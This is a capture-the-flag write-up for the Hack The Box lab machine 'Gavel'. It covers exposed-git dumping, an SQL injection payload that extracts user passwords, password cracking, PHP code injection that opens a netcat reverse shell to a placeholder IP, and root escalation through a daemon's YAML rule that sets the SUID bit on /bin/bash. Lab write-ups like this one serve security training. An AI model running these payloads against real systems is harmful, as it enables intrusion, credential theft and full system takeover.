Gavel (HTB)

Enumeration.

# Nmap 7.97 scan initiated Sat Dec  6 12:02:21 2025 as: nmap -sS -A -v -o scan.nmap 10.10.11.97
Nmap scan report for 10.10.11.97
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1f:de:9d:84:bf:a1:64:be:1f:36:4f:ac:3c:52:15:92 (ECDSA)
|_  256 70:a5:1a:53:df:d1:d0:73:3e:9d:90:ad:c1:aa:b4:19 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://gavel.htb/
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 20.698 days (since Sat Nov 15 19:18:04 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: gavel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   10.51 ms 10.10.14.1
2   10.54 ms 10.10.11.97

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  6 12:02:35 2025 -- 1 IP address (1 host up) scanned in 13.38 seconds

Classic machine let's check the website

Enumerating the web server.

Basically the website is like a game where you can bid for items. This is not where we going to focus on using dirsearch we can find the .git exposed.

dirsearch -u http://gavel.htb -t 40

Using git-dumper.

GitHub - arthaud/git-dumper: A tool to dump a git repository from a websiteGitHub

We can get the whole .git folder from the web site.

python3 git_dumper.py http://gavel.htb gavle-git

This command will give us the .git folder in the gavel-git .

Code analysis.

There is two thing we going to consider and focus on here.

SQL injection in inventory.php

$sortItem = $_POST['sort'] ?? $_GET['sort'] ?? 'item_name';
$userId = $_POST['user_id'] ?? $_GET['user_id'] ?? $_SESSION['user']['id'];
$col = "`" . str_replace("`", "", $sortItem) . "`";
$itemMap = [];
$itemMeta = $pdo->prepare("SELECT name, description, image FROM items WHERE name = ?");
try {
    if ($sortItem === 'quantity') {
        $stmt = $pdo->prepare("SELECT item_name, item_image, item_description, quantity FROM inventory WHERE user_id = ? ORDER BY quantity DESC");
        $stmt->execute([$userId]);
    } else {
        $stmt = $pdo->prepare("SELECT $col FROM inventory WHERE user_id = ? ORDER BY item_name ASC");
        $stmt->execute([$userId]);
    }
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
} catch (Exception $e) {
    $results = [];
}

Here is a thing we can notice that the $col is a variable that can fetch a column from the database. The thing is that when the perpare statment is calidating the user input it does not validate this one. So we can use it to exploit the SQLI. I have talk a lot about how is work in this artical.

Does “prepare” statements even secure ??Medium

Second in the file bid_handler.php:55

try {
    if (function_exists('ruleCheck')) {
        runkit_function_remove('ruleCheck');
    }
    runkit_function_add('ruleCheck', '$current_bid, $previous_bid, $bidder', $rule);
    error_log("Rule: " . $rule);
    $allowed = ruleCheck($current_bid, $previous_bid, $bidder);
} catch (Throwable $e) {
    error_log("Rule error: " . $e->getMessage());
    $allowed = false;
}

Here we have the function runkit_function_add used to allow function definition in run time (while the code is executing) So if we can control the $rule then we can define a function to execute.

Exploiting SQL injection.

Beside what is mentioned in the artical

Does “prepare” statements even secure ??Medium

Let's see the exploit.

In the path http://gavel.htb/inventory.php we can find a sort function that sort our items.
Let's intercept the request.

Using these two fields we can achieve SQL injection.

user_id=x`+FROM+(SELECT+CONCAT(username,+password)+AS+`'x`+from+users)y;%23&sort=\?--%00

Collect the passwords and save them into a file to crack them.

john --wordlist=<WORDLIST_PATH> <FILE>

Now that we have these creds we can login into that user which is the admin.

Getting RCE.

Very cool let's see what's in there.

Basically this what we have discuss if we are able to change the rule which is true in this case we can execute php code.

so am going to use this payload.

function g(){ system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc <IP> <PORT> > /tmp/f &"); return true; } g();

Just notice that the function must return true. At least in my case.

Now let's change this with any message and let's place a bid in the Bidding tab in order to our function to be executed.

and then in the Bidding we just need to place a bid .

And if you do not forgot to start a listener.

nc -nlvp 9091

From auctioneer to root.

Getting stable shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

Then using this command we can switch into the auctioneer user which I found in the /etc/passwd . And the password shall be the same that we crack.

su auctioneer

then using the id command we can see this.

id
uid=1001(auctioneer) gid=1002(auctioneer) groups=1002(auctioneer),1001(gavel-seller)

Our user is a member of another group. Let's see what that group has.

find / -group "gavel-seller" 2>/dev/null

This command will show us all the files that belongs to the gavel-seller group.

/run/gaveld.sock
/usr/local/bin/gavel-util

Cool we have these two files. After investigation and clearly seen here gaveld .

Background processes in Linux usually called demons which indicated with the d in the end of the name same as sshd .

Anyway knowing that we can check this services status.


auctioneer@gavel:~$ systemctl status gaveld
● gaveld.service - Gavel Root Daemon
     Loaded: loaded (/etc/systemd/system/gaveld.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2025-12-08 08:29:34 UTC; 1h 1min ago
   Main PID: 936 (gaveld)
      Tasks: 2 (limit: 4558)
     Memory: 5.2M
        CPU: 133ms
     CGroup: /system.slice/gaveld.service
             └─936 /opt/gavel/gaveld

Warning: some journal files were not opened due to insufficient permissions.

We can see the config file too here. Let's see what it contains.

auctioneer@gavel:~$ cat /etc/systemd/system/gaveld.service
cat /etc/systemd/system/gaveld.service
[Unit]
Description=Gavel Root Daemon
After=network.target

[Service]
ExecStart=/opt/gavel/gaveld
Restart=always
User=root
Group=root
RuntimeDirectory=gavel
RuntimeDirectoryMode=0755

[Install]
WantedBy=multi-user.target

So the daemon executable exist there in /opt/gavel/gaveld . Surly we can reverse engineer it to find what it has but let's see what we got there first.

There we going to find a file called sample.yaml

auctioneer@gavel:/opt/gavel$ cat sample.yaml
cat sample.yaml
---
item:
  name: "Dragon's Feathered Hat"
  description: "A flamboyant hat rumored to make dragons jealous."
  image: "https://example.com/dragon_hat.png"
  price: 10000
  rule_msg: "Your bid must be at least 20% higher than the previous bid and sado isn't allowed to buy this item."
  rule: "return ($current_bid >= $previous_bid * 1.2) && ($bidder != 'sado');"

So basically using the gavel-util tool when can communicate with that service the help menu for it shows us more.

auctioneer@gavel:/opt/gavel$ gavel-util
gavel-util
Usage: gavel-util <cmd> [options]
Commands:
  submit <file>           Submit new items (YAML format)
  stats                   Show Auction stats
  invoice                 Request invoice

So we can submit a YAML file but if we send this sample we going to find this.

auctioneer@gavel:/opt/gavel$ gavel-util submit sample.yaml
gavel-util submit sample.yaml
YAML missing required keys: name description image price rule_msg rule

so we need to construct these again in a YAML file. But notice the rule field takes a function so if it not filtered or protected then we can execute PHP code as root. But let's see what protection this php engine has.

We can find these protections in /opt/gavel/.config/php/php.ini

auctioneer@gavel:/opt/gavel/.config/php$ cat php.ini
cat php.ini
engine=On
display_errors=On
open_basedir=
disable_functions=

And as we can see no protection is there so we can execute PHP code.

Am going to use this payload.

name: "Dragons Feathered Hat"
description: "A flamboyant hat rumored to make dragons jealous."
image: "https://example.com/dragon_hat.png"
price: 10000
rule_msg: "Your bid must be at least 20% higher than the previous bid and sado isnt allowed to buy this item."
rule: |
  system("chmod 4777 /bin/bash");
  return false;

This just simple add suid bit into the bash executable so that when executed it will give us the privilege of the owner of the file which is root .

auctioneer@gavel:/tmp$ gavel-util submit p.yaml
gavel-util submit p.yaml
Item submitted for review in next auction

After putting the payload into p.yaml run it and we shall find what we want.

Cool one thing to not before we move on and we going to discuss later. Is that we shall return false when running out PHP code for reason I will be covering later on.

auctioneer@gavel:/tmp$ /bin/bash -p
bash-5.1# whoami
root

We just need to add the -p flag to prevent it from dropping our privilege.

Problem discussion.

Last updated 13 days ago